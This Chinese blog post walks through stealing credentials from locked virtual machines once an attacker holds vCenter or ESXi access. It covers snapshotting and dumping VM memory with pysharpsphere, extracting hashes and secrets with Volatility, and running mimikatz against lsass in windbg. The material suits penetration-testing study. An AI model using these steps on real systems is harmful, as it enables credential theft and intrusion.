VCenter获得锁屏机器Hash之内存快照抓取Hash

VSole2022-07-11 07:58:22

VCenter获得锁屏机器Hash之内存快照抓取Hash

内存快照抓hash

    在很多情况下,当我们拿到VCenter或ESXI 服务器权限和Web后台权限登录后,发现很多重要的系统锁屏了,想要进入还需要输入密 码。因此,这时我们就需要抓取处于锁屏状态机器的Hash了。以下介绍使用内存快照抓取Hash。

    使用pysharpsphere或SharpSphere对指定目标机器拍摄快照,然后dump镜像到本地。

#dump MoID为vm-59的机器镜像到本地

pysharpsphere -H 192.168.106.14 -u administrator@vsphere.local -p "P@ssword1234" dump -t vm-59

Volatility读取内存

目标机器快照镜像dump到本地后,可以使用Volatility直接对.vmem文件进行内存密码抓取。

如下命令获取镜像信息:

./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem imageinfo

如下命令抓取哈希或明文密码:

#抓取哈希

./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 hashdump

#抓取明文密码

./volatility_2.6_mac64_standalone -f Win7-Snapshot2.vmem --profile=Win7SP1x64 lsadump

windbg读取内存

也可以使用windbg进行读取。首先使用 Bin2Dmp执行如下命令将该内存文件转成dmp文件,如下转成win7.dmp文件。

Bin2Dmp.exe Win7-Snapshot2.vmem win7.dmp

然后使用windbg载入win7.dmp文件,如下。

接着在kd> 中输入下面的命令

#设置符号路径

.symfix  

#重新载入

.reload   

#加载mimilib.dll路径

.load D:\mimikatz\x64\mimilib.dll  

#查找lsass进程,并将该进程转到本机环境中

!process 0 0 lsass.exe

#这里的fffffa80035c4b30是上一步查找lsass进程的地址,注意替换

.process /r /p fffffa80035c4b30  

#载入mimikatz,读取密码

!mimikatz

最后读取出密码如下。

hashvcenter
本作品采用《CC 协议》,转载必须注明作者和本文链接
笔者在对volatility工具进行了解后,对分析vmem文件的手法进行了一定优化,可以提升解决锁屏问题的效率。不过官方团队并没有打包volatility3的可执行程序,原因写的是打包出来的packages会被识别为恶意软件,解决了这个问题就会出可执行程序了。过程思路一、直接在esxi中部署volatility3项目Linux环境下的esxi,这个思考很快就被证明不太可行了,volatility3需要多个系统库和pip库:yum install zlib &&\yum install zlib-devel &&\yum install bzip2-devel &&\yum install ncurses-devel &&\yum install sqlite-devel &&\yum install readline-devel &&\yum install gcc &&\yum install libffi &&\yum install libffi-devel &&\yum install gcc-c++\yum install openssl-devel\yum install tk-devel
在很多情况下,当我们拿到VCenter或ESXI 服务器权限和Web后台权限登录后,发现很多重要的系统锁屏了,想要进入还需要输入密 码。因此,这时我们就需要抓取处于锁屏状态机器的Hash了。
在很多情况下,当我们拿到VCenter或ESXI 服务器权限和Web后台权限登录后,发现很多重要的系统锁屏了,想要进入还需要输入密 码。因此,这时我们就需要抓取处于锁屏状态机器的Hash了。
VCenter获得锁屏机器Hash之KonBoot引导KonBoot引导免密登录????以下介绍使用KonBoot引导免密进入。????因为该方法需要重启机器,因此先对目标主机进行克隆,此后的所有操作对克隆主机进行操作。
VMware vCenter漏洞实战利用总结
Vcenter一般指VMware vCenter Server,其提供了一个可伸缩、可扩展的平台,为虚拟化管理奠定了基础,可集中管理VMware vSphere环境,与其他管理平台相比,极大地提高了IT管理员对虚拟环境的控制,Vcenter可以使管理员从一个位置深入了解虚拟基础架构的集群、主机、虚拟机、存储、客户操作系统和其他关键组件等所有信息。
vCenter Server 常用攻击手法
在内网渗透中常常会碰到VmwareVcenter,对实战打法以及碰到的坑点做了一些总结,部分内容参考了师傅们提供的宝贵经验,衷心感谢各位师傅!
VMware Inc. 是一家软件公司。它开发了许多产品,尤其是各种云解决方案 。他的云解决方案包括云产品,数据中心产品和桌面产品等。
目标分配后,面对大范围的目标,首先要做的就是寻找一些容易获取权限的站点,比如shiro、weblogic以及各类反序列化漏洞。之后再将目标锁定到管理后台,使用爆破等手段寻找一些能进后台的账号密码,然后再去找上传点拿shell。 本次渗透在某站注册页面发现了上传身份证的地方,但是上传后发现无返回路径。
VSole
网络安全专家